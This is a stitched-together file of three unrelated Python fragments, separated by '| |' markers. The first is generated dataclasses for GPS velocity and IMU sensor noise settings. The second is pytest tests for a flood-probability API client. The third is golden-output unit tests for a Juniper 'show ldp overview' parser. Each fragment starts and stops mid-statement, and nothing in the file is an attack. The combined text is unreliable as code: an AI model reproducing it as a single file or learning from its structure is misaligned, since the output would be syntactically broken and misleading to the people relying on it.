measurement from a Gaussian distribution).
"gaussian_quantized" ("gaussian" plus
quantization of outputs (ie. rounding))
"""
mean: float = field(
default=0.0,
metadata={
"type": "Element",
"namespace": "",
"required": True,
},
)
stddev: float = field(
default=0.0,
metadata={
"type": "Element",
"namespace": "",
"required": True,
},
)
bias_mean: float = field(
default=0.0,
metadata={
"type": "Element",
"namespace": "",
"required": True,
},
)
bias_stddev: float = field(
default=0.0,
metadata={
"type": "Element",
"namespace": "",
"required": True,
},
)
precision: float = field(
default=0.0,
metadata={
"type": "Element",
"namespace": "",
"required": True,
},
)
type: Optional[str] = field(
default=None,
metadata={
"type": "Attribute",
"required": True,
},
)
@dataclass
class VelocitySensing:
"""
Parameters related to GPS position measurement.
Parameters
----------
horizontal: Noise parameters for horizontal velocity
measurement, in units of meters/second.
vertical: Noise parameters for vertical velocity
measurement, in units of meters/second.
"""
horizontal: Optional["Sensor.Gps.VelocitySensing.Horizontal"] = field(
default=None,
metadata={
"type": "Element",
"namespace": "",
},
)
vertical: Optional["Sensor.Gps.VelocitySensing.Vertical"] = field(
default=None,
metadata={
"type": "Element",
"namespace": "",
},
)
@dataclass
class Horizontal:
"""
Noise parameters for horizontal velocity measurement, in units
of meters/second.
Parameters
----------
noise: The properties of a sensor noise model.
"""
noise: Optional["Sensor.Gps.VelocitySensing.Horizontal.Noise"] = field(
default=None,
metadata={
"type": "Element",
"namespace": "",
"required": True,
},
)
@dataclass
class Noise:
"""
The properties of a sensor noise model.
Parameters
----------
mean: For type "gaussian*", the mean of the Gaussian
distribution from which noise values are drawn.
stddev: For type "gaussian*", the standard deviation
of the Gaussian distribution from which noise
values are drawn.
bias_mean: For type "gaussian*", the mean of the
Gaussian distribution from which bias values are
drawn.
bias_stddev: For type "gaussian*", the standard
deviation of the Gaussian distribution from
which bias values are drawn.
precision: For type "gaussian_quantized", the
precision of output signals. A value of
zero implies infinite precision / no
quantization.
type: The type of noise. Currently supported types
are: "none" (no noise). "gaussian"
(draw noise values independently for each
measurement from a Gaussian distribution).
"gaussian_quantized" ("gaussian" plus
quantization of outputs (ie. rounding))
"""
mean: float = field(
default=0.0,
metadata={
"type": "Element",
"namespace": "",
"required": True,
},
)
stddev: float = field(
default=0.0,
metadata={
"type": "Element",
"namespace": "",
"required": True,
},
)
bias_mean: float = field(
default=0.0,
metadata={
"type": "Element",
"namespace": "",
"required": True,
},
)
bias_stddev: float = field(
default=0.0,
metadata={
"type": "Element",
"namespace": "",
"required": True,
},
)
precision: float = field(
default=0.0,
metadata={
"type": "Element",
"namespace": "",
"required": True,
},
)
type: Optional[str] = field(
default=None,
metadata={
"type": "Attribute",
"required": True,
},
)
@dataclass
class Vertical:
"""
Noise parameters for vertical velocity measurement, in units of
meters/second.
Parameters
----------
noise: The properties of a sensor noise model.
"""
noise: Optional["Sensor.Gps.VelocitySensing.Vertical.Noise"] = field(
default=None,
metadata={
"type": "Element",
"namespace": "",
"required": True,
},
)
@dataclass
class Noise:
"""
The properties of a sensor noise model.
Parameters
----------
mean: For type "gaussian*", the mean of the Gaussian
distribution from which noise values are drawn.
stddev: For type "gaussian*", the standard deviation
of the Gaussian distribution from which noise
values are drawn.
bias_mean: For type "gaussian*", the mean of the
Gaussian distribution from which bias values are
drawn.
bias_stddev: For type "gaussian*", the standard
deviation of the Gaussian distribution from
which bias values are drawn.
precision: For type "gaussian_quantized", the
precision of output signals. A value of
zero implies infinite precision / no
quantization.
type: The type of noise. Currently supported types
are: "none" (no noise). "gaussian"
(draw noise values independently for each
measurement from a Gaussian distribution).
"gaussian_quantized" ("gaussian" plus
quantization of outputs (ie. rounding))
"""
mean: float = field(
default=0.0,
metadata={
"type": "Element",
"namespace": "",
"required": True,
},
)
stddev: float = field(
default=0.0,
metadata={
"type": "Element",
"namespace": "",
"required": True,
},
)
bias_mean: float = field(
default=0.0,
metadata={
"type": "Element",
"namespace": "",
"required": True,
},
)
bias_stddev: float = field(
default=0.0,
metadata={
"type": "Element",
"namespace": "",
"required": True,
},
)
precision: float = field(
default=0.0,
metadata={
"type": "Element",
"namespace": "",
"required": True,
},
)
type: Optional[str] = field(
default=None,
metadata={
"type": "Attribute",
"required": True,
},
)
@dataclass
class Imu:
"""
These elements are specific to the IMU sensor.
Parameters
----------
topic: Topic on which data is published.
noise: The properties of the noise model that should be applied
to generated data
"""
topic: str = field(
default="__default_topic__",
metadata={
"type": "Element",
"namespace": "",
"required": True,
},
)
noise: Optional["Sensor.Imu.Noise"] = field(
default=None,
metadata={
"type": "Element",
"namespace": "",
},
)
@dataclass
class Noise:
"""
The properties of the noise model that should be applied to
generated data.
Parameters
----------
type: The type of noise. Currently supported types are:
"gaussian" (draw noise values independently for each
beam from a Gaussian distribution).
rate: Noise parameters for angular rates.
accel: Noise parameters for linear accelerations.
"""
type: str = field(
default="gaussian",
metadata={
"type": "Element",
"namespace": "",
"required": True,
},
)
rate: Optional["Sensor.Imu.Noise.Rate"] = field(
default=None,
metadata={
| |
not None
assert probability[0].count[0].get("data")[0].get("data")[0].get("bin") is not None
assert probability[0].count[0].get("data")[0].get("data")[0].get("count") is not None
assert probability[0].count[0].get("data")[0].get("data")[0].get("count").get("low") is not None
assert probability[0].count[0].get("data")[0].get("data")[0].get("count").get("mid") is not None
assert probability[0].count[0].get("data")[0].get("data")[0].get("count").get("high") is not None
probability = fs.probability.get_count([39], 'state', csv=True, output_dir=tmpdir)
assert len(probability) == 1
assert probability[0].valid_id is True
assert probability[0].fsid == "39"
assert probability[0].count is not None
assert probability[0].count[0].get("year") is not None
assert probability[0].count[0].get("data") is not None
assert probability[0].count[0].get("data")[0].get("returnPeriod") is not None
assert probability[0].count[0].get("data")[0].get("data") is not None
assert probability[0].count[0].get("data")[0].get("data")[0].get("bin") is not None
assert probability[0].count[0].get("data")[0].get("data")[0].get("count") is not None
assert probability[0].count[0].get("data")[0].get("data")[0].get("count").get("low") is not None
assert probability[0].count[0].get("data")[0].get("data")[0].get("count").get("mid") is not None
assert probability[0].count[0].get("data")[0].get("data")[0].get("count").get("high") is not None
class TestProbabilityCountSummary:
def test_empty(self):
with pytest.raises(InvalidArgument):
fs.probability.get_count_summary([], "")
def test_wrong_fsid_type(self):
with pytest.raises(InvalidArgument):
fs.probability.get_count_summary(19)
def test_invalid(self):
fsid = [0000000]
probability = fs.probability.get_count_summary(fsid)
assert len(probability) == 1
assert probability[0].fsid == str(fsid[0])
assert probability[0].state is None
assert probability[0].valid_id is False
def test_single(self):
fsid = [394406220]
probability = fs.probability.get_count_summary(fsid)
assert len(probability) == 1
assert probability[0].fsid == str(fsid[0])
assert probability[0].state is not None
assert probability[0].valid_id is True
def test_multiple(self):
fsid = [394406220, 193139123]
probability = fs.probability.get_count_summary(fsid)
assert len(probability) == 2
probability.sort(key=lambda x: x.fsid, reverse=True)
assert probability[0].fsid == str(fsid[0])
assert probability[1].fsid == str(fsid[1])
assert probability[0].state is not None
assert probability[0].valid_id is True
assert probability[1].state is not None
assert probability[1].valid_id is True
def test_single_csv(self, tmpdir):
fsid = [394406220]
probability = fs.probability.get_count_summary(fsid, csv=True, output_dir=tmpdir)
assert len(probability) == 1
assert probability[0].fsid == str(fsid[0])
assert probability[0].state is not None
assert probability[0].valid_id is True
def test_multiple_csv(self, tmpdir):
fsid = [394406220, 193139123]
probability = fs.probability.get_count_summary(fsid, csv=True, output_dir=tmpdir)
assert len(probability) == 2
probability.sort(key=lambda x: x.fsid, reverse=True)
assert probability[0].fsid == str(fsid[0])
assert probability[1].fsid == str(fsid[1])
assert probability[0].state is not None
assert probability[0].valid_id is True
assert probability[1].state is not None
assert probability[1].valid_id is True
def test_mixed_invalid(self):
fsid = [394406220, 000000000]
probability = fs.probability.get_count_summary(fsid)
assert len(probability) == 2
probability.sort(key=lambda x: x.fsid, reverse=True)
assert probability[0].fsid == str(fsid[0])
assert probability[1].fsid == str(fsid[1])
assert probability[0].state is not None
assert probability[0].valid_id is True
assert probability[1].state is None
assert probability[1].valid_id is False
def test_mixed_invalid_csv(self, tmpdir):
fsid = [394406220, 000000000]
probability = fs.probability.get_count_summary(fsid, csv=True, output_dir=tmpdir)
assert len(probability) == 2
probability.sort(key=lambda x: x.fsid, reverse=True)
assert probability[0].fsid == str(fsid[0])
assert probability[1].fsid == str(fsid[1])
assert probability[0].state is not None
assert probability[0].valid_id is True
assert probability[1].state is None
assert probability[1].valid_id is False
def test_coordinate_invalid(self, tmpdir):
probability = fs.probability.get_count_summary([(82.487671, -62.374322)], csv=True, output_dir=tmpdir)
assert len(probability) == 1
assert probability[0].state is None
assert probability[0].valid_id is False
def test_single_coordinate(self, tmpdir):
probability = fs.probability.get_count_summary([(40.7079652311, -74.0021455387)], csv=True, output_dir=tmpdir)
assert len(probability) == 1
assert probability[0].state is not None
assert probability[0].valid_id is True
def test_address_invalid_404(self, tmpdir):
probability = fs.probability.get_count_summary(["Shimik, Nunavut, Canada"], csv=True, output_dir=tmpdir)
assert len(probability) == 1
assert probability[0].state is None
assert probability[0].valid_id is False
def test_address_invalid_500(self, tmpdir):
probability = fs.probability.get_count_summary(["Toronto, Ontario, Canada"], csv=True, output_dir=tmpdir)
assert len(probability) == 1
assert probability[0].state is None
assert probability[0].valid_id is False
def test_single_address(self, tmpdir):
probability = fs.probability.get_count_summary(["247 Water St, New York, New York"],
csv=True, output_dir=tmpdir)
assert len(probability) == 1
assert probability[0].state is not None
assert probability[0].valid_id is True
def test_one_of_each(self, tmpdir):
probability = fs.probability.get_count_summary([394406220], csv=True, output_dir=tmpdir)
assert len(probability) == 1
assert probability[0].valid_id is True
assert probability[0].fsid == "394406220"
assert probability[0].neighborhood is not None
assert probability[0].city is not None
assert probability[0].state is not None
assert probability[0].zcta is not None
assert probability[0].county is not None
assert probability[0].cd is not None
assert probability[0].tract is not None
class TestProbabilityCumulative:
def test_empty(self):
with pytest.raises(InvalidArgument):
fs.probability.get_cumulative([], "")
def test_wrong_fsid_type(self):
with pytest.raises(InvalidArgument):
fs.probability.get_cumulative(190836953)
def test_invalid(self):
fsid = [0000000]
probability = fs.probability.get_cumulative(fsid)
assert len(probability) == 1
assert probability[0].fsid == str(fsid[0])
assert probability[0].cumulative is None
assert probability[0].valid_id is False
def test_single(self):
fsid = [190836953]
probability = fs.probability.get_cumulative(fsid)
assert len(probability) == 1
assert probability[0].fsid == str(fsid[0])
assert probability[0].cumulative is not None
assert probability[0].valid_id is True
def test_multiple(self):
fsid = [190836953, 193139123]
probability = fs.probability.get_cumulative(fsid)
assert len(probability) == 2
probability.sort(key=lambda x: x.fsid)
assert probability[0].fsid == str(fsid[0])
assert probability[1].fsid == str(fsid[1])
assert probability[0].cumulative is not None
assert probability[0].valid_id is True
assert probability[1].cumulative is not None
assert probability[1].valid_id is True
def test_single_csv(self, tmpdir):
fsid = [190836953]
probability = fs.probability.get_cumulative(fsid, csv=True, output_dir=tmpdir)
assert len(probability) == 1
assert probability[0].fsid == str(fsid[0])
assert probability[0].cumulative is not None
assert probability[0].valid_id is True
def test_multiple_csv(self, tmpdir):
fsid = [190836953, 193139123]
probability = fs.probability.get_cumulative(fsid, csv=True, output_dir=tmpdir)
assert len(probability) == 2
probability.sort(key=lambda x: x.fsid)
assert probability[0].fsid == str(fsid[0])
assert probability[1].fsid == str(fsid[1])
assert probability[0].cumulative is not None
assert probability[0].valid_id is True
assert probability[1].cumulative is not None
assert probability[1].valid_id is True
def test_mixed_invalid(self):
fsid = [190836953, 000000000]
probability = fs.probability.get_cumulative(fsid)
assert len(probability) == 2
probability.sort(key=lambda x: x.fsid, reverse=True)
assert probability[0].fsid == str(fsid[0])
assert probability[1].fsid == str(fsid[1])
assert probability[0].cumulative is not None
assert probability[0].valid_id is True
assert probability[1].cumulative is None
assert probability[1].valid_id is False
def test_mixed_invalid_csv(self, tmpdir):
fsid = [190836953, 000000000]
probability = fs.probability.get_cumulative(fsid, csv=True, output_dir=tmpdir)
assert len(probability) == 2
probability.sort(key=lambda x: x.fsid, reverse=True)
assert probability[0].fsid == str(fsid[0])
assert probability[1].fsid == str(fsid[1])
assert probability[0].cumulative is not None
assert probability[0].valid_id is True
assert probability[1].cumulative is None
assert probability[1].valid_id is False
def test_coordinate_invalid(self, tmpdir):
probability = fs.probability.get_cumulative([(82.487671, -62.374322)], csv=True, output_dir=tmpdir)
assert len(probability) == 1
assert probability[0].cumulative is None
assert probability[0].valid_id is False
def test_single_coordinate(self, tmpdir):
probability = fs.probability.get_cumulative([(40.7079652311, -74.0021455387)], csv=True, output_dir=tmpdir)
assert len(probability) == 1
assert probability[0].cumulative is not None
assert probability[0].valid_id is True
def test_address_invalid_404(self, tmpdir):
probability = fs.probability.get_cumulative(["Shimik, Nunavut, Canada"], csv=True, output_dir=tmpdir)
assert len(probability) == 1
assert probability[0].cumulative is None
assert probability[0].valid_id is False
def test_address_invalid_500(self, tmpdir):
probability = fs.probability.get_cumulative(["Toronto, Ontario, Canada"], csv=True, output_dir=tmpdir)
assert len(probability) == 1
assert probability[0].cumulative is None
assert probability[0].valid_id is False
def test_single_address(self, tmpdir):
probability = fs.probability.get_cumulative(["247 Water St, New York, New York"], csv=True, output_dir=tmpdir)
assert len(probability) == 1
assert probability[0].cumulative is not None
assert probability[0].valid_id is True
def test_one_of_each(self, tmpdir):
probability = fs.probability.get_cumulative([390000439], csv=True, output_dir=tmpdir)
assert len(probability) == 1
assert probability[0].valid_id is True
assert probability[0].fsid == "390000439"
assert probability[0].cumulative is not None
assert probability[0].cumulative[0].get("year") is not None
assert probability[0].cumulative[0].get("data") is not None
assert probability[0].cumulative[0].get("data")[0].get("threshold") is not None
assert probability[0].cumulative[0].get("data")[0].get("data") is not None
assert probability[0].cumulative[0].get("data")[0].get("data").get("low") is not None
assert probability[0].cumulative[0].get("data")[0].get("data").get("mid") is not None
assert probability[0].cumulative[0].get("data")[0].get("data").get("high") is not None
class TestProbabilityDepth:
def test_empty(self):
with pytest.raises(InvalidArgument):
fs.probability.get_depth([], "")
def test_wrong_fsid_type(self):
with pytest.raises(InvalidArgument):
fs.probability.get_depth(190836953)
def test_invalid(self):
fsid = [0000000]
probability = fs.probability.get_depth(fsid)
assert len(probability) == 1
assert probability[0].fsid == str(fsid[0])
assert probability[0].depth is None
assert probability[0].valid_id is False
def test_single(self):
fsid = [190836953]
probability = fs.probability.get_depth(fsid)
assert len(probability) == 1
assert probability[0].fsid == str(fsid[0])
assert probability[0].depth is not None
assert probability[0].valid_id is True
def test_multiple(self):
fsid = [190836953, 193139123]
probability = fs.probability.get_depth(fsid)
assert len(probability) == 2
probability.sort(key=lambda x: x.fsid)
assert probability[0].fsid == str(fsid[0])
assert probability[1].fsid == str(fsid[1])
assert probability[0].depth is not None
assert probability[0].valid_id is True
assert probability[1].depth is not None
assert probability[1].valid_id is True
def test_single_csv(self, tmpdir):
fsid = [190836953]
probability = fs.probability.get_depth(fsid, csv=True, output_dir=tmpdir)
assert len(probability) == 1
assert probability[0].fsid == str(fsid[0])
assert probability[0].depth is not None
assert probability[0].valid_id is True
def test_multiple_csv(self, tmpdir):
fsid = [190836953, 193139123]
probability = fs.probability.get_depth(fsid, csv=True, output_dir=tmpdir)
assert len(probability) == 2
probability.sort(key=lambda x: x.fsid)
assert probability[0].fsid == str(fsid[0])
assert probability[1].fsid == str(fsid[1])
assert probability[0].depth is not None
assert probability[0].valid_id is True
assert probability[1].depth is not None
assert probability[1].valid_id is True
def test_mixed_invalid(self):
fsid = [190836953, 000000000]
probability = fs.probability.get_depth(fsid)
assert len(probability) == 2
probability.sort(key=lambda x: x.fsid, reverse=True)
assert probability[0].fsid == str(fsid[0])
assert probability[1].fsid == str(fsid[1])
assert probability[0].depth is not None
assert probability[0].valid_id is True
assert probability[1].depth is None
assert probability[1].valid_id is False
def test_mixed_invalid_csv(self, tmpdir):
fsid = [190836953, 000000000]
probability = fs.probability.get_depth(fsid, csv=True, output_dir=tmpdir)
assert len(probability) == 2
probability.sort(key=lambda x: x.fsid, reverse=True)
assert probability[0].fsid == str(fsid[0])
assert probability[1].fsid == str(fsid[1])
assert probability[0].depth is not None
assert probability[0].valid_id is True
assert probability[1].depth is None
assert probability[1].valid_id is False
def test_coordinate_invalid(self, tmpdir):
probability = fs.probability.get_depth([(82.487671, -62.374322)], csv=True, output_dir=tmpdir)
assert len(probability) == 1
assert probability[0].depth is None
assert probability[0].valid_id is False
def test_single_coordinate(self, tmpdir):
probability = fs.probability.get_depth([(40.7079652311, -74.0021455387)], csv=True, output_dir=tmpdir)
assert len(probability) == 1
assert probability[0].depth is not None
assert probability[0].valid_id is True
def test_address_invalid_404(self, tmpdir):
probability = fs.probability.get_depth(["Shimik, | |
loop quantum: 100
Backup inbound read job time quantum: 1000, Backup outbound read job time quantum: 1000
Backup inbound read job loop quantum: 100, Backup outbound read job loop quantum: 100
Label allocation:
Current number of LDP labels allocated: 0
Total number of LDP labels allocated: 0
Total number of LDP labels freed: 0
Total number of LDP label allocation failure: 0
Current number of labels allocated by all protocols: 0
'''}
golden_parsed_output_4 = {
'ldp-overview-information': {
'ldp-overview': {
'ldp-auto-targeted-session': {
'ldp-auto-targeted-dyn-tun-ses-count': 0,
'ldp-auto-targeted-session-enabled': 'disabled'
},
'ldp-bgp-export': 'enabled',
'ldp-configuration-sequence': 1,
'ldp-deaggregate': 'disabled',
'ldp-explicit-null': 'disabled',
'ldp-gr-overview': {
'ldp-gr-helper': 'enabled',
'ldp-gr-max-neighbor-reconnect-time': 120000,
'ldp-gr-max-neighbor-recovery-time': 240000,
'ldp-gr-reconnect-time': 60000,
'ldp-gr-recovery-time': 160000,
'ldp-gr-restart': 'disabled',
'ldp-gr-restarting': 'false'
},
'ldp-igp-overview': {
'ldp-igp-sync-session-up-delay': 10,
'ldp-tracking-igp-metric': 'disabled'
},
'ldp-inet': 'enabled',
'ldp-instance-capability': {
'ldp-capability': 'none'
},
'ldp-instance-egress-fec-capability': {
'ldp-egress-fec-capability': 'entropy-label-capability'
},
'ldp-instance-name': 'master',
'ldp-interface-address': {
'interface-address': '10.1.2.2'
},
'ldp-ipv6-tunneling': 'disabled',
'ldp-job-overview': {
'ldp-inbound-read-job-loop-quantum': 100,
'ldp-inbound-read-job-time-quantum': 1000,
'ldp-outbound-read-job-loop-quantum': 100,
'ldp-outbound-read-job-time-quantum': 1000,
'ldp-read-job-loop-quantum': 100,
'ldp-read-job-time-quantum': 1000,
'ldp-write-job-loop-quantum': 100,
'ldp-write-job-time-quantum': 1000
},
'ldp-label-allocation': {
'ldp-global-label-current-allocs': 0,
'ldp-label-alloc-failure': 0,
'ldp-label-current-allocs': 0,
'ldp-label-total-allocs': 0,
'ldp-label-total-frees': 0
},
'ldp-loopback-if-added': 'no',
'ldp-message-id': 4,
'ldp-mtu-discovery': 'disabled',
'ldp-p2mp': {
'ldp-p2mp-no-rsvp-tunneling-enabled': 'disabled',
'ldp-p2mp-recursive-route-enabled': 'disabled'
},
'ldp-p2mp-transit-lsp-chaining': 'disabled',
'ldp-reference-count': 2,
'ldp-route-acknowledgement': 'enabled',
'ldp-route-preference': 9,
'ldp-router-id': '10.204.14.100',
'ldp-session-count': {
'ldp-control-mode': 'ordered',
'ldp-retention-mode': 'liberal',
'ldp-session-nonexistent': 1
},
'ldp-session-protect-overview': {
'ldp-session-protect': 'disabled',
'ldp-session-protect-timeout': 0
},
'ldp-sr-mapping-client': 'disabled',
'ldp-strict-targeted-hellos': 'disabled',
'ldp-te-overview': {
'ldp-te-bgp-igp': 'disabled',
'ldp-te-both-ribs': 'disabled',
'ldp-te-mpls-forwarding': 'disabled'
},
'ldp-timer-overview': {
'ldp-instance-keepalive-interval': 10,
'ldp-instance-keepalive-timeout': 30,
'ldp-instance-label-withdraw-delay': 60,
'ldp-instance-link-hello-hold-time': 15,
'ldp-instance-link-hello-interval': 5,
'ldp-instance-link-protection-timeout': 120,
'ldp-instance-make-before-break-switchover-delay': 3,
'ldp-instance-make-before-break-timeout': 30,
'ldp-instance-targeted-hello-hold-time': 45,
'ldp-instance-targeted-hello-interval': 15
},
'ldp-transit-lsp-route-stats': 'disabled',
'ldp-transport-preference': 'IPv4',
'ldp-unicast-transit-lsp-chaining': 'disabled'
}
}
}
golden_output_5 = {'execute.return_value': '''
show ldp overview
Instance: master
Router ID: 10.204.1.100
Message id: 4
Configuration sequence: 1
Deaggregate: disabled
Explicit null: disabled
IPv6 tunneling: disabled
Strict targeted hellos: disabled
Loopback if added: no
Route preference: 9
Unicast transit LSP chaining: disabled
P2MP transit LSP chaining: disabled
Transit LSP statistics based on route statistics: disabled
Capabilities enabled: none
Protocol modes:
Distribution: unsolicited
Retention: liberal
Control: ordered
Sessions:
Connecting: 1
Timers:
Keepalive interval: 10, Keepalive timeout: 30
Link hello interval: 5, Link hello hold time: 15
Targeted hello interval: 15, Targeted hello hold time: 45
Label withdraw delay: 60
Graceful restart:
Restart: enabled, Helper: enabled, Restart in process: false
Reconnect time: 60000, Max neighbor reconnect time: 120000
Recovery time: 160000, Max neighbor recovery time: 240000
Traffic Engineering:
Bgp igp: disabled
Both ribs: disabled
Mpls forwarding: disabled
IGP:
Tracking igp metric: disabled
Sync session up delay: 10
Session protection:
Session protection: disabled
Session protecton timeout: 0
Interface addresses advertising:
10.1.2.2
'''}
golden_parsed_output_5 = {
'ldp-overview-information': {
'ldp-overview': {
'ldp-configuration-sequence': 1,
'ldp-deaggregate': 'disabled',
'ldp-explicit-null': 'disabled',
'ldp-gr-overview': {
'ldp-gr-helper': 'enabled',
'ldp-gr-max-neighbor-reconnect-time': 120000,
'ldp-gr-max-neighbor-recovery-time': 240000,
'ldp-gr-reconnect-time': 60000,
'ldp-gr-recovery-time': 160000,
'ldp-gr-restart': 'enabled',
'ldp-gr-restarting': 'false'
},
'ldp-igp-overview': {
'ldp-igp-sync-session-up-delay': 10,
'ldp-tracking-igp-metric': 'disabled'
},
'ldp-instance-capability': {
'ldp-capability': 'none'
},
'ldp-instance-name': 'master',
'ldp-interface-address': {
'interface-address': '10.1.2.2'
},
'ldp-ipv6-tunneling': 'disabled',
'ldp-loopback-if-added': 'no',
'ldp-message-id': 4,
'ldp-p2mp-transit-lsp-chaining': 'disabled',
'ldp-protocol-modes': {
'ldp-control-mode': 'ordered',
'ldp-distribution-mode': 'unsolicited',
'ldp-retention-mode': 'liberal'
},
'ldp-route-preference': 9,
'ldp-router-id': '10.204.1.100',
'ldp-session-count': {
'ldp-session-connecting': 1
},
'ldp-session-protect-overview': {
'ldp-session-protect': 'disabled',
'ldp-session-protect-timeout': 0
},
'ldp-strict-targeted-hellos': 'disabled',
'ldp-te-overview': {
'ldp-te-bgp-igp': 'disabled',
'ldp-te-both-ribs': 'disabled',
'ldp-te-mpls-forwarding': 'disabled'
},
'ldp-timer-overview': {
'ldp-instance-keepalive-interval': 10,
'ldp-instance-keepalive-timeout': 30,
'ldp-instance-label-withdraw-delay': 60,
'ldp-instance-link-hello-hold-time': 15,
'ldp-instance-link-hello-interval': 5,
'ldp-instance-targeted-hello-hold-time': 45,
'ldp-instance-targeted-hello-interval': 15
},
'ldp-transit-lsp-route-stats': 'disabled',
'ldp-unicast-transit-lsp-chaining': 'disabled'
}
}
}
golden_parsed_output_6 = {
"ldp-overview-information": {
"ldp-overview": {
"ldp-auto-targeted-session": {
"ldp-auto-targeted-dyn-tun-ses-count": 0,
"ldp-auto-targeted-session-enabled": "disabled"
},
"ldp-bgp-export": "enabled",
"ldp-configuration-sequence": 2,
"ldp-control-mode": "ordered",
"ldp-deaggregate": "disabled",
"ldp-explicit-null": "disabled",
"ldp-gr-overview": {
"ldp-gr-helper": "enabled",
"ldp-gr-max-neighbor-reconnect-time": 120000,
"ldp-gr-max-neighbor-recovery-time": 240000,
"ldp-gr-reconnect-time": 60000,
"ldp-gr-recovery-time": 160000,
"ldp-gr-restart": "enabled",
"ldp-gr-restarting": "false"
},
"ldp-igp-overview": {
"ldp-igp-sync-session-up-delay": 10,
"ldp-tracking-igp-metric": "disabled"
},
"ldp-inet": "enabled",
"ldp-instance-capability": {
"ldp-capability": "none"
},
"ldp-instance-egress-fec-capability": {
"ldp-egress-fec-capability": "entropy-label-capability"
},
"ldp-instance-name": "master",
"ldp-interface-address": {
"interface-address": "10.169.14.157"
},
"ldp-ipv6-tunneling": "disabled",
"ldp-job-overview": {
"ldp-inbound-read-job-loop-quantum": 100,
"ldp-inbound-read-job-time-quantum": 1000,
"ldp-outbound-read-job-loop-quantum": 100,
"ldp-outbound-read-job-time-quantum": 1000,
"ldp-read-job-loop-quantum": 100,
"ldp-read-job-time-quantum": 1000,
"ldp-write-job-loop-quantum": 100,
"ldp-write-job-time-quantum": 1000
},
"ldp-label-allocation": {
"ldp-global-label-current-allocs": 0,
"ldp-label-alloc-failure": 0,
"ldp-label-current-allocs": 3,
"ldp-label-total-allocs": 7,
"ldp-label-total-frees": 4
},
"ldp-loopback-if-added": "no",
"ldp-message-id": 10,
"ldp-mtu-discovery": "disabled",
"ldp-p2mp": {
"ldp-p2mp-no-rsvp-tunneling-enabled": "disabled",
"ldp-p2mp-recursive-route-enabled": "disabled"
},
"ldp-p2mp-transit-lsp-chaining": "disabled",
"ldp-reference-count": 3,
"ldp-retention-mode": "liberal",
"ldp-route-acknowledgement": "enabled",
"ldp-route-preference": 9,
"ldp-router-id": "10.169.14.240",
"ldp-session-count": {
"ldp-control-mode": "ordered",
"ldp-retention-mode": "liberal",
"ldp-session-nonexistent": 1
},
"ldp-session-operational": 1,
"ldp-session-protect-overview": {
"ldp-session-protect": "disabled",
"ldp-session-protect-timeout": 0
},
"ldp-sr-mapping-client": "disabled",
"ldp-strict-targeted-hellos": "disabled",
"ldp-te-overview": {
"ldp-te-bgp-igp": "disabled",
"ldp-te-both-ribs": "disabled",
"ldp-te-mpls-forwarding": "disabled"
},
"ldp-timer-overview": {
"ldp-instance-keepalive-interval": 10,
"ldp-instance-keepalive-timeout": 30,
"ldp-instance-label-withdraw-delay": 60,
"ldp-instance-link-hello-hold-time": 15,
"ldp-instance-link-hello-interval": 5,
"ldp-instance-link-protection-timeout": 120,
"ldp-instance-make-before-break-switchover-delay": 3,
"ldp-instance-make-before-break-timeout": 30,
"ldp-instance-targeted-hello-hold-time": 45,
"ldp-instance-targeted-hello-interval": 15
},
"ldp-transit-lsp-route-stats": "disabled",
"ldp-transport-preference": "IPv4",
"ldp-unicast-transit-lsp-chaining": "disabled"
}
}
}
golden_output_6 = {'execute.return_value': '''
show ldp overview
Instance: master
Reference count: 3
Router ID: 10.169.14.240
LDP inet: enabled
Transport preference: IPv4
Message id: 10
Configuration sequence: 2
Deaggregate: disabled
Explicit null: disabled
IPv6 tunneling: disabled
Strict targeted hellos: disabled
Loopback if added: no
Route preference: 9
Unicast transit LSP chaining: disabled
P2MP transit LSP chaining: disabled
Transit LSP statistics based on route statistics: disabled
LDP route acknowledgement: enabled
BGP export: enabled
LDP mtu discovery: disabled
LDP SR Mapping Client: disabled
Capabilities enabled: none
Egress FEC capabilities enabled: entropy-label-capability
Downstream unsolicited Sessions:
Nonexistent: 1
Retention: liberal
Control: ordered
Operational: 1
Retention: liberal
Control: ordered
Auto targeted sessions:
Auto targeted: disabled
Dynamic tunnel session count: 0
P2MP:
Recursive route: disabled
No rsvp tunneling: disabled
Timers:
Keepalive interval: 10, Keepalive timeout: 30
Link hello interval: 5, Link hello hold time: 15
Targeted hello interval: 15, Targeted hello hold time: 45
Label withdraw delay: 60, Make before break timeout: 30
Make before break switchover delay: 3
Link protection timeout: 120
Graceful restart:
Restart: enabled, Helper: enabled, Restart in process: false
Reconnect time: 60000, Max neighbor reconnect time: 120000
Recovery time: 160000, Max neighbor recovery time: 240000
Traffic Engineering:
Bgp igp: disabled
Both ribs: disabled
Mpls forwarding: disabled
IGP:
Tracking igp metric: disabled
Sync session up delay: 10
Session protection:
Session protection: disabled
Session protection timeout: 0
Interface addresses advertising:
10.169.14.121
10.169.14.157
LDP Job:
Read job time quantum: 1000, Write job time quantum: 1000
Read job loop quantum: 100, Write job loop quantum: 100
Backup inbound read job time quantum: 1000, Backup outbound read job time quantum: 1000
Backup inbound read job loop quantum: 100, Backup outbound read job loop quantum: 100
Label allocation:
Current number of LDP labels allocated: 3
Total number of LDP labels allocated: 7
Total number of LDP labels freed: 4
Total number of LDP label allocation failure: 0
Current number of labels allocated by all protocols: 0
'''}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowLDPOverview(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse()
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowLDPOverview(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output)
def test_golden_2(self):
self.device = Mock(**self.golden_output_2)
obj = ShowLDPOverview(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output_2)
def test_golden_3(self):
self.device = Mock(**self.golden_output_3)
obj = ShowLDPOverview(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output_3)
def test_golden_4(self):
self.device = Mock(**self.golden_output_4)
obj = ShowLDPOverview(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output_4)
def test_golden_5(self):
self.device = Mock(**self.golden_output_5)
obj = ShowLDPOverview(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output_5)
def test_golden_6(self):
self.device = Mock(**self.golden_output_6)
obj = ShowLDPOverview(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output_6)
# =================================
# Unit test for 'show ldp session {ipaddress} detail'
# =================================
class TestShowLDPSessionIpaddressDetail(unittest.TestCase):
'''unit test for "show ldp session {ipaddress} detail'''
